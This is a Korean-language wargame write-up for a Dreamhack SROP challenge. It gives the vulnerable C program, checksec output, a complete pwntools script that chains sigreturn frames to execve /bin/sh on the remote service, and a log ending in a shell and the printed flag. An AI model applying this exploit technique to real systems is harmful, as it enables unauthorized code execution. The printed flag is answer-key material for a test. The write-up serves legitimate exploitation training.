문제 코드
#include <unistd.h>
/* Deliberately exposed "pop rax; syscall; ret" sequence. Because rax is
 * popped from the stack right before the syscall, anyone who controls the
 * stack also chooses the system call number (the write-up uses 15,
 * rt_sigreturn). Declared int but never returns a value: it is only ever
 * reached as a gadget, never called normally. */
int gadget() {
asm("pop %rax;"
"syscall;"
"ret" );
}
/* Reads up to 1024 bytes from stdin into a 16-byte stack buffer: this is
 * the stack buffer overflow the write-up exploits. The fix is to bound the
 * read by the buffer, e.g. read(0, buf, sizeof buf); the binary is also
 * built without a stack canary, so nothing catches the overwritten return
 * address. */
int main()
{
char buf[16];
read(0, buf ,1024);
}
- buf 크기가 16바이트인데 read()로 최대 1024바이트까지 입력을 받고 있어서 스택 버퍼 오버플로우가 발생합니다.
- gadget 함수의 pop rax; syscall; ret 가젯을 이용해 SROP(Sigreturn-Oriented Programming) 공격을 할 수 있습니다.
보호 기법
kali@kali ~/wargame/dreamhack/SROP checksec srop
[*] '/home/kali/wargame/dreamhack/SROP/srop'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
익스플로잇 코드
# SROP (sigreturn-oriented programming) solve script for the srop binary
# shown above. Requires pwntools. The binary has No PIE and no stack canary
# (checksec output above), which is what lets the script use static gadget
# addresses and a plain return-address overwrite.
from pwn import *
# SigreturnFrame() lays out registers for the configured arch, so this must
# be set before any frame is built.
context.arch = "x86_64"
p = remote("host3.dreamhack.games", 21552)
elf = ELF("./srop")
# Static addresses (No PIE): the body of gadget() and a bare syscall insn.
gadget = next(elf.search(asm("pop rax; syscall")))
syscall = next(elf.search(asm("syscall")))
read_got = elf.got['read']   # NOTE(review): unused below
_start = elf.symbols['_start']   # NOTE(review): unused below
binsh = b"/bin/sh\x00"
bss = elf.bss()
# Stage-1 frame: once rt_sigreturn restores these registers, the syscall at
# rip runs read(0, bss, 0x1000) and the stack pointer already sits at .bss,
# so the data just read is what the following ret consumes.
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = bss
frame.rdx = 0x1000
frame.rip = syscall
frame.rsp = bss
# 16 bytes fill buf; the next 8 presumably cover the saved frame pointer
# (depends on the compiled stack layout); then gadget becomes the return
# address.
payload = b"A"*16
payload += b"B"*8
payload += p64(gadget)
# gadget pops this into rax: 15 is rt_sigreturn on x86-64, so the syscall
# that follows loads the register state from the frame placed below.
payload += p64(15)
payload += bytes(frame)
p.sendline(payload)
# Stage 2 is read into .bss with rsp == bss: the same gadget/15 pair, then a
# frame for execve("/bin/sh", ...) with the remaining registers left at the
# frame defaults.
frame2 = SigreturnFrame()
frame2.rip = syscall
frame2.rax = 0x3b
# 0x108 == 8 + 8 + len(bytes(frame2)): the offset of binsh inside rop.
frame2.rdi = bss + 0x108
# Any writable address works as the new stack; this just keeps it inside .bss.
frame2.rsp = bss + 0x500
rop = p64(gadget)
rop += p64(15)
rop += bytes(frame2)
rop += binsh
p.sendline(rop)
p.interactive()
익스플로잇
kali@kali ~/wargame/dreamhack/SROP python3 remote.py
[+] Opening connection to host3.dreamhack.games on port 21552: Done
[*] '/home/kali/wargame/dreamhack/SROP/srop'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] Switching to interactive mode
$
$ ls
flag
srop
$ cat flag
DH{4a177764b353c1295afec0071a8e7951}